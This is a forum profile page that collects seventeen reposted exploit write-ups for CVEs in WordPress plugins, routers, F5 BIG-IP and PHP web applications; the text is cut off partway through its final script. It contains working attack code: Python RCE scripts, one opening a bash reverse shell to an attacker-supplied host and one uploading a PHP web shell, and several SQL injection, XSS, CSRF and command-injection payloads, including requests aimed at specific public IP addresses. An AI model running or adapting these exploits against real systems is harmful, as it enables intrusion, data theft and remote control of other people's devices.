Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated) # Date: 05-02-2022 # Exploit Author: Hassan Khan Yusufzai - Splint3r7 # Vendor Homepage: https://wordpress.org/plugins/stafflist/ # Version: 3.1.2 # Tested on: Firefox # Contact me: h [at] spidersilk.com # Vulnerable Code: $w = (isset($_GET['search']) && (string) trim($_GET['search'])!="" ? ... $where = ($w ? "WHERE LOWER(lastname) LIKE '%{$w}%' OR LOWER(firstname) LIKE '%{$w}%' OR LOWER(department) LIKE '%{$w}%' OR LOWER(email) LIKE '%{$w}%'" : ""); # Vulnerable URL http://localhost:10003/wp-admin/admin.php?page=stafflist&search=[SQLI] # POC ``` sqlmap -u 'http://localhost:10003/wp-admin/admin.php?page=stafflist&search=test*' --cookie="wordpress_cookies_paste_here" ``` # POC Image https://prnt.sc/AECcFRHhe2ib
  2. HireHackking

    WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF)

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF) Date: 2021-07-27 Exploit Author : WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF) Vendor Homepage : https://wpscan.com/plugin/blue-admi Version : <= 21.06.01 Tested on: windows 10 Professional CVE : CVE-2021-24581 <html> <body> <form action="http://example.com/wp-admin/admin.php?page=blue-admin&tab=blue_admin_login_page" method="POST" enctype="multipart/form-data"> <input type="hidden" name="ba_lp_attr[fm_bg_color]" value="FFFFFF" /> <input type="hidden" name="ba_lp_attr[fm_color]" value="777777" /> <input type="hidden" name="ba_lp_attr[logo_text]" value='WP"><script>alert(/XSS/)</script>' /> <input type="hidden" name="ba_lp_attr[logo_url]" value="https://example.com" /> <input type="hidden" name="ba_lp_attr[logo_img]" value="" /> <input type="hidden" name="ba_lp_attr[bg_color]" value="EEEEEE" /> <input type="hidden" name="ba_lp_attr[text_color]" value="222222" /> <input type="hidden" name="ba_lp_attr[bg_img]" value="" /> <input type="hidden" name="ba_lp_attr[bg_img_pos]" value="" /> <input type="hidden" name="ba_lp_attr[bg_img_rep]" value="" /> <input type="hidden" name="ba_lp_options_save" value="Save changes" /> <input type="submit" value="Submit request" /> </form> </body> </html>
  3. HireHackking

    Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated) # Google Dork: None # Date: November 1, 2021 # Exploit Author: Minh Khoa of VSEC # Vendor Homepage: https://ruijienetworks.com # Software Link: https://www.ruijienetworks.com/resources/products/1896-1900 # Version: ReyeeOS 1.55.1915 - EW_3.0(1)B11P35 and EW_3.0(1)B11P55 # Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO # CVE: CVE-2021-43164 #!/usr/bin/python3 import os import sys import time import requests import json def enc(PASS): key = "RjYkhwzx$2018!" shell = "echo '{}' | openssl enc -aes-256-cbc -a -k '{}' -md md5 2>/dev/null".format(PASS, key) return os.popen(shell).read().strip() try: TARGET = sys.argv[1] USER = sys.argv[2] PASS = sys.argv[3] COMMAND = sys.argv[4] except Exception: print("CVE-2021-43164 PoC") print("Usage: python3 exploit.py <target> <user> <pass> <command>") print("Example: python3 exploit.py 192.168.110.1 admin password 'touch /tmp/pwned'") sys.exit(1) endpoint = "http://{}/cgi-bin/luci/api/auth".format(TARGET) payload = { "method": "login", "params": { "username": USER, "password": enc(PASS), "encry": True, "time": int(time.time()), "limit": False } } r = requests.post(endpoint, json=payload) sid = json.loads(r.text)["data"]["sid"] endpoint = "http://{}/cgi-bin/luci/api/wireless?auth={}".format(TARGET, sid) payload = { "method": "updateVersion", "params": { "jsonparam": "'; {} #".format(COMMAND) } } r = requests.post(endpoint, json=payload) print(r.text)
  4. HireHackking

    TLR-2005KSH - Arbitrary File Upload

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: TLR-2005KSH - Arbitrary File Upload # Date: 2022-05-11 # Shodan Dork: title:"Login to TLR-2021" # Exploit Author: Ahmed Alroky # Author Company : Aiactive # Version: 1.0.0 # Vendor home page : http://telesquare.co.kr/ # Authentication Required: No # Tested on: Windows # CVE: CVE-2021-45428 # Vulnerability Description # Due to the Via WebDAV (Web Distributed Authoring and Versioning), # on the remote server,telesquare TLR-2021 allows unauthorized users to upload # any file(e.g. asp, aspx, cfm, html, jhtml, jsp, shtml) which causes # remote code execution as well. # Due to the WebDAV, it is possible to upload the arbitrary # file utilizing the PUT method. # Proof-of-Concept # Request PUT /l6f3jd6cbf.txt HTTP/1.1 Host: 223.62.114.233:8081<http://223.62.114.233:8081/> Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Connection: close Content-Length: 10
  5. HireHackking

    F5 BIG-IP 16.0.x - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: F5 BIG-IP 16.0.x - Remote Code Execution (RCE) # Exploit Author: Yesith Alvarez # Vendor Homepage: https://www.f5.com/products/big-ip-services # Version: 16.0.x # CVE : CVE-2022-1388 from requests import Request, Session import sys import json def title(): print(''' _______ ________ ___ ___ ___ ___ __ ____ ___ ___ / ____\ \ / / ____| |__ \ / _ \__ \|__ \ /_ |___ \ / _ \ / _ \ | | \ \ / /| |__ ______ ) | | | | ) | ) |_____| | __) | (_) | (_) | | | \ \/ / | __|______/ /| | | |/ / / /______| ||__ < > _ < > _ < | |____ \ / | |____ / /_| |_| / /_ / /_ | |___) | (_) | (_) | \_____| \/ |______| |____|\___/____|____| |_|____/ \___/ \___/ Author: Yesith Alvarez Github: https://github.com/yealvarez Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/ ''') def exploit(url, lhost, lport): url = url + 'mgmt/tm/util/bash' data = { "command":"run", "utilCmdArgs":"-c 'bash -i >& /dev/tcp/"+lhost+"/"+lport+" 0>&1'" } headers = { 'Authorization': 'Basic YWRtaW46', 'Connection':'keep-alive, X-F5-Auth-Token', 'X-F5-Auth-Token': '0' } s = Session() req = Request('POST', url, json=data, headers=headers) prepped = req.prepare() del prepped.headers['Content-Type'] resp = s.send(prepped, verify=False, timeout=15 ) #print(prepped.headers) #print(url) #print(resp.headers) #print(resp.json()) print(resp.status_code) if __name__ == '__main__': title() if(len(sys.argv) < 4): print('[+] USAGE: python3 %s https://<target_url> lhost lport\n'%(sys.argv[0])) print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.11 4444\n'%(sys.argv[0])) print('[+] Do not forget to run the listener: nc -lvp 4444\n') exit(0) else: exploit(sys.argv[1],sys.argv[2],sys.argv[3])
  6. HireHackking

    TLR-2005KSH - Arbitrary File Delete

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: TLR-2005KSH - Arbitrary File Delete # Date: 2022-05-11 # Exploit Author: Ahmed Alroky # Author Company : AIactive # Version: 1.0.0 # Vendor home page : http://telesquare.co.kr/ # Authentication Required: No # Tested on: Windows # CVE: CVE-2021-46424 # Proof-of-Concept # Request DELETE /cgi-bin/test2.txt HTTP/1.1 Host: 220.89.223.215:8083 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close
  7. HireHackking

    Royal Event Management System 1.0 - 'todate' SQL Injection (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Royal Event Management System 1.0 - 'todate' SQL Injection (Authenticated) # Date: 2022-26-03 # Exploit Author: Eren Gozaydin # Vendor Homepage: https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip # Version: 1.0 # Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51 # CVE: CVE-2022-28080 # References: https://nvd.nist.gov/vuln/detail/CVE-2022-28080 ------------------------------------------------------------------------------------ 1. Description: ---------------------- Royal Event Management System 1.0 allows SQL Injection via parameter 'todate' in /royal_event/btndates_report.php#?= Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 2. Proof of Concept: ---------------------- In Burpsuite intercept the request from the affected page with 'todate' parameter and save it like poc.txt. Then run SQLmap to extract the data from the database: sqlmap -r poc.txt --dbms=mysql 3. Example payload: ---------------------- (boolean-based) -1%27+OR+1%3d1+OR+%27ns%27%3d%27ns 4. Burpsuite request: ---------------------- POST /royal_event/btndates_report.php#?= HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Content-Length: 334 Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0 Cookie: PHPSESSID=qeoe141g7guakhacf152a3i380 Referer: http://localhost/royal_event/btndates_report.php#?= User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36 --f289a6438bcc45179bcd3eb7ddc555d0 Content-Disposition: form-data; name="todate" -1' OR 1=1 OR 'ns'='ns --f289a6438bcc45179bcd3eb7ddc555d0 Content-Disposition: form-data; name="search" 3 --f289a6438bcc45179bcd3eb7ddc555d0 Content-Disposition: form-data; name="fromdate" 01/01/2011 --f289a6438bcc45179bcd3eb7ddc555d0--
  8. HireHackking

    College Management System 1.0 - 'course_code' SQL Injection (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: College Management System - 'course_code' SQL Injection (Authenticated) # Date: 2022-24-03 # Exploit Author: Eren Gozaydin # Vendor Homepage: https://code-projects.org/college-management-system-in-php-with-source-code/ # Software Link: https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f # Version: 1.0 # Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51 # CVE: CVE-2022-28079 # References: https://nvd.nist.gov/vuln/detail/CVE-2022-28079 ------------------------------------------------------------------------------------ 1. Description: ---------------------- College Management System 1.0 allows SQL Injection via parameter 'course_code' in /College-Management-System/admin/asign-single-student-subjects.php. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 2. Proof of Concept: ---------------------- In Burpsuite intercept the request from the affected page with 'course_code' parameter and save it like poc.txt Then run SQLmap to extract the data from the database: sqlmap -r poc.txt --dbms=mysql 3. Example payload: ---------------------- boolean-based blind Payload: submit=Press&roll_no=3&course_code=-6093' OR 2121=2121 AND 'ddQQ'='ddQQ 4. Burpsuite request: ---------------------- POST /College-Management-System/admin/asign-single-student-subjects.php HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Content-Length: 80 Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID=jhnlvntmv8q4gtgsof9l1f1hhe Referer: http://localhost/College-Management-System/admin/asign-single-student-subjects.php User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36 submit=Press&roll_no=3&course_code=Select+Course%27+OR+1%3d1+OR+%27ns%27%3d%27ns
  9. HireHackking

    SDT-CW3B1 1.1.0 - OS Command Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SDT-CW3B1 1.1.0 - OS command injection # Date: 2022-05-12 # Exploit Author: Ahmed Alroky # Author Company : AIactive # Version: 1.0.0 # Vendor home page : http://telesquare.co.kr/ # Authentication Required: No # CVE : CVE-2021-46422 # Tested on: Windows # HTTP Request GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id HTTP/1.1 Host: IP_HERE User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Accept: */* Referer: http:// IP_HERE /admin/system_command.shtml Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close
  10. HireHackking

    T-Soft E-Commerce 4 - SQLi (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: T-Soft E-Commerce 4 - SQLi (Authenticated) # Exploit Author: Alperen Ergel # Contact: @alpernae (IG/TW) # Software Homepage: https://www.tsoft.com.tr/ # Version : v4 # Tested on: Kali Linux # Category: WebApp # Google Dork: N/A # CVE: 2022-28132 # Date: 18.02.2022 ######## Description ########################################### # # # # Step-1: Login as Admin or with privilage user # Step-2: Open burp or zap and request the {PoC REQUEST PATH} vulnerable path # Step-3: Capture the request save as .txt # Step-4: Run SQLMAP with this command 'sqlmap -r {req.txt} --dbs --level 5 --risk 3 --tamper=space2comment' --random-agent' # Step-5: Now you're be able to see the dbs for more search 'how to use sqlmap advance' # # Impact: Attacker can see the what have in database and it's big impact and attacker can stole datas... # # # ######## Proof of Concept ######################################## ========>>> REQUEST <<<========= GET /Y/Moduller/_Urun/Json.php?_dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=&SatisUst= &marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0&yeni=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20 HTTP/2 Host: domain.com Cookie: lang=tr; v4=on; nocache=1; TSOFT_USER=xxx@xx.com; customDashboardMapping=true; countryCode=TR; rest1SupportUser=0; nocache=1; yayinlanmaDurumuPopup=1; yayinlanmaDurumuPopupTimeout=864000; PHPSESSID=fcfa85a5603de7b64bc08eaf68bc51ca; U_TYPE_CK=131; U_TYPE_OK=c16a5320fa475530d9583c34fd356ef5; TSOFT_LOGGED=7d025a34d0526c8896d713159b0d1ffe; email=; phone=; password= Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="98" X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Sec-Ch-Ua-Platform: "Linux" Accept: */* Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://domain.com/srv/admin/products/products-v2/index Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 =============> RESULTS OF THE SQLMAP <========================== Parameter: SatisAlt (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: _dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=' AND 1331=1331 AND 'RcAU'='RcAU&SatisUst=&marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0&yeni=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20 --- back-end DBMS: MySQL 5 available databases [2]: [*] d25082_db [*] information_schema [13:05:31] [INFO] GET parameter 'SatisAlt' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable
  11. HireHackking

    T-Soft E-Commerce 4 - 'UrunAdi' Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: T-Soft E-Commerce 4 - 'UrunAdi' Stored Cross-Site Scripting (XSS) # Exploit Author: Alperen Ergel (alpernae IG/TW) # Web Site: https://alperenae.gitbook.io/ # Software Homepage: https://www.tsoft.com.tr/ # Version : v4 # Tested on: Kali Linux # Category: WebApp # Google Dork: N/A # Date: 2022-05-10 # CVE :N/A ######## Description ######## # # 1-) Login administrator page and add product # # 2-) add product name to xss payload # # 3-) Back to web site then will be work payload # # ######## Proof of Concept ######## ========>>> REQUEST <<<========= POST /Y/Moduller/_Urun/Ekle/Action.php HTTP/1.1 Host: domain.com Cookie: lang=tr; v4=on; nocache=1; TSOFT_USER=xxxx@xxx.com; customDashboardMapping=true; PHPSESSID=18d05ae557640c93fd9739e241850438; rest1SupportUser=0; nocache=1; last_products=12 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 1028 Origin: https://domain.com Dnt: 1 Referer: https://domain.com/srv/admin/products/save-edit/index?id=12 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close task=UPDATE&Kategori=18&UrunId=12&UrunAdi={PAYLOAD}&MarkaId=0&MarkaAd=&ModelId=0&ModelAd=&Tedarikci=0&TedarikciKodu=12&StokSayisi=100 &StokBirimId=1&StokBirimAd=Adet&EnYeniUrun=0&EnCokSatilan=0&AramaKelimeleri=&HamSatis=200&AlisFiyat=100&HavaleYuzde=0&Birim=0 &KDV=18&KdvGoster=false&point_catalog=false&IndirimliUrun=true&AltUrunVar=false&YeniUrun=true&AnaSayfaUrun=true&VitrinUrun=false &Gorunme=true&BayiUrun=false&SiparisNotuGoster=false&En=0&Boy=0&Derinlik=0&Agirlik=0&Desi=1&GarantiBilgisi= &TeslimatBilgisi=&UrunNot=&WsUrunKodu=T12&SeoAyar=3&SeoTitle=&SeoLink=deneme-urun-1&SeoDesc=&SeoKeyw= &Detay=%C3%9Cr%C3%BCn%20ekleme%20konusunda%20detayl%C4%B1%20bilgi%20i%C3%A7in%2C%20videomuzu%20 izleyebilirsiniz%3A%C2%A0%0A%3Cdiv%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DoWlUHvi4IPw%22%3Ehttps%3A%2F%2Fwww.youtube.com% 2Fwatch%3Fv%3DoWlUHvi4IPw%3C%2Fa%3E%3C%2Fdiv%3E&AnaKategoriId=18&point=0&subscribe=0&subscribe_frequency=&subscribe_discount_rate=0 &UruneKargoUcretsiz=0&UyeUcretsizKargo=0&BayiUcretsizKargo=0&Sayisal1=0
  12. HireHackking

    Survey Sparrow Enterprise Survey Software 2022 - Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Survey Sparrow Enterprise Survey Software 2022 - Stored Cross-Site Scripting (XSS) # Date: May 11 2022 # Exploit Author: Pankaj Kumar Thakur # Vendor Homepage: https://surveysparrow.com/ # Software Link: https://surveysparrow.com/enterprise-survey-software/ # Version: 2022 # Tested on: Windows # CVE : CVE-2022-29727 # References: https://www.tenable.com/cve/CVE-2022-29727 https://github.com/haxpunk1337/Enterprise-Survey-Software/blob/main/Enterprise-Survey-Software%202022 #POC For Stored XSS Visit https://LOCALHOST/login?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)// XSS Executed
  13. HireHackking

    SolarView Compact 6.0 - OS Command Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SolarView Compact 6.0 - OS Command Injection # Date: 2022-05-15 # Exploit Author: Ahmed Alroky # Author Company : AIactive # Version: ver.6.00 # Vendor home page : https://www.contec.com/ # Authentication Required: No # CVE : CVE-2022-29303 # Tested on: Windows # Exploit # HTTP Request : POST /conf_mail.php HTTP/1.1 Host: HOST_IP Content-Length: 77 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://HOST_IP Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://HOST_IP/conf_mail.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close mail_address=%3Bid%3Bwhoami%3Bpwd%3Bls%3B&button=%83%81%81%5B%83%8B%91%97%90M
  14. HireHackking

    Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS) # Exploit Author: Akshay Ravi # Vendor Homepage: https://github.com/star7th/showdoc # Software Link: https://github.com/star7th/showdoc/releases/tag/v2.10.3 # Version: <= 2.10.3 # Tested on: macOS Monterey # CVE : CVE-2022-0967 Description: Stored XSS via uploading file in .ofd format 1. Create a file with .ofd extension and add XSS Payload inside the file filename = "payload.ofd" payload = "<script>alert(1)</script>" 2. Login to showdoc v2.10.2 and go to file library Endpoint = "https://www.site.com/attachment/index" 3. Upload the payload on file library and click on the check button 4. The XSS payload will executed once we visited the URL
  15. HireHackking

    OpenCart v3.x Newsletter Module - Blind SQLi

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: OpenCart v3.x Newsletter Module - Blind SQLi # Date: 19/05/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.opencart.com/ # Software Link: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=32750&filter_member=Zemez # Version: v.3.0.2.0 # Tested on: XAMPP, Linux # Contact: https://twitter.com/dmaral3noz * Description : Newsletter Module is compatible with any Opencart allows SQL Injection via parameter 'zemez_newsletter_email' in /index.php?route=extension/module/zemez_newsletter/addNewsletter. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. * Steps to Reproduce : - Go to : http://127.0.0.1/index.php?route=extension/module/zemez_newsletter/addNewsletter - Save request in BurpSuite - Run saved request with : sqlmap -r sql.txt -p zemez_newsletter_email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbs Request : =========== POST /index.php?route=extension/module/zemez_newsletter/addNewsletter HTTP/1.1 Content-Type: application/x-www-form-urlencoded Cookie: OCSESSID=aaf920777d0aacdee96eb7eb50 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Content-Length: 29 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Connection: Keep-alive zemez_newsletter_email=saud =========== Output : Parameter: zemez_newsletter_email (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: zemez_newsletter_email=saud%' AND 4728=(SELECT (CASE WHEN (4728=4728) THEN 4728 ELSE (SELECT 4929 UNION SELECT 7220) END))-- - Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: zemez_newsletter_email=saud%' OR (SELECT 4303 FROM(SELECT COUNT(*),CONCAT(0x716a6b7171,(SELECT (ELT(4303=4303,1))),0x7162787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xlVz%'='xlVz Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: zemez_newsletter_email=saud%' AND (SELECT 5968 FROM (SELECT(SLEEP(5)))yYJX) AND 'yJkK%'='yJkK
  16. HireHackking

    Contao 4.13.2 - Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Contao 4.13.2 - Cross-Site Scripting (XSS) # Google Dork: NA # Date: 04/28/2022 # Exploit Author: Chetanya Sharma @AggressiveUser # Vendor Homepage: https://contao.org/en/ # Software Link: https://github.com/contao/contao/releases/tag/4.13.2 # Version: [ 4.13.2 ] # Tested on: [KALI OS] # CVE : CVE-2022-1588 # References: - https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/ - https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2 - https://contao.org/en/security-advisories/cross-site-scripting-via-canonical-url.html --------------- Steps to reproduce: Navigate to the below URL URL: https://localhost/contao/"><svg//onload=alert(112233)>
  17. HireHackking

    m1k1o's Blog v.10 - Remote Code Execution (RCE) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: m1k1o's Blog v.10 - Remote Code Execution (RCE) (Authenticated) # Date: 2022-01-06 # Exploit Author: Malte V # Vendor Homepage: https://github.com/m1k1o/blog # Software Link: https://github.com/m1k1o/blog/archive/refs/tags/v1.3.zip # Version: 1.3 and below # Tested on: Linux # CVE : CVE-2022-23626 import argparse import json import re from base64 import b64encode import requests as req from bs4 import BeautifulSoup parser = argparse.ArgumentParser(description='Authenticated RCE File Upload Vulnerability for m1k1o\'s Blog') parser.add_argument('-ip', '--ip', help='IP address for reverse shell', type=str, default='172.17.0.1', required=False) parser.add_argument('-u', '--url', help='URL of machine without the http:// prefix', type=str, default='localhost', required=False) parser.add_argument('-p', '--port', help='Port for the Blog', type=int, default=8081, required=False) parser.add_argument('-lp', '--lport', help='Listening port for reverse shell', type=int, default=9999, required=False) parser.add_argument('-U', '--username', help='Username for Blog user', type=str, default='username', required=False) parser.add_argument('-P', '--password', help='Password for Blog user', type=str, default='password', required=False) args = vars(parser.parse_args()) username = args['username'] password = args['password'] lhost_ip = args['ip'] lhost_port = args['lport'] address = args['url'] port = args['port'] url = f"http://{address}:{port}" blog_cookie = "" csrf_token = "" exploit_file_name = "" header = { "Host": f"{address}", "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "X-Requested-With": "XMLHttpRequest", "Csrf-Token": f"{csrf_token}", "Cookie": f"PHPSESSID={blog_cookie}" } def get_cookie(complete_url): global blog_cookie cookie_header = {} if not blog_cookie: cookie_header['Cookie'] = f"PHPSESSID={blog_cookie}" result = req.get(url=complete_url, headers=cookie_header) if result.status_code == 200: blog_cookie = result.cookies.get_dict()['PHPSESSID'] print(f'[+] Found PHPSESSID: {blog_cookie}') grep_csrf(result) def grep_csrf(result): global csrf_token csrf_regex = r"[a-f0-9]{10}" soup = BeautifulSoup(result.text, 'html.parser') script_tag = str(soup.findAll('script')[1].contents[0]) csrf_token = re.search(csrf_regex, script_tag).group(0) print(f'[+] Found CSRF-Token: {csrf_token}') def login(username, password): get_cookie(url) login_url = f"{url}/ajax.php" login_data = f"action=login&nick={username}&pass={password}" login_header = { "Host": f"{address}", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "X-Requested-With": "XMLHttpRequest", "Csrf-Token": f"{csrf_token}", "Cookie": f"PHPSESSID={blog_cookie}" } result = req.post(url=login_url, headers=login_header, data=login_data) soup = BeautifulSoup(result.text, 'html.parser') login_content = json.loads(soup.text) if login_content.get('logged_in'): print('[*] Successful login') else: print('[!] Bad login') def set_cookie(result): global blog_cookie blog_cookie = result.cookies.get_dict()['PHPSESSID'] def generate_payload(command): return f""" -----------------------------13148889121752486353560141292 Content-Disposition: form-data; name="file"; filename="malicious.gif.php" Content-Type: application/x-httpd-php GIF<?php system(base64_decode('{b64encode(bytes(command, 'utf-8')).decode('ascii')}')); ?>; -----------------------------13148889121752486353560141292-- """ def send_payload(): payload_header = { "Host": f"{address}", "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "X-Requested-With": "XMLHttpRequest", "Csrf-Token": f"{csrf_token}", "Cookie": f"PHPSESSID={blog_cookie}" } upload_url = f"http://{address}:{port}/ajax.php?action=upload_image" command = f"php -r 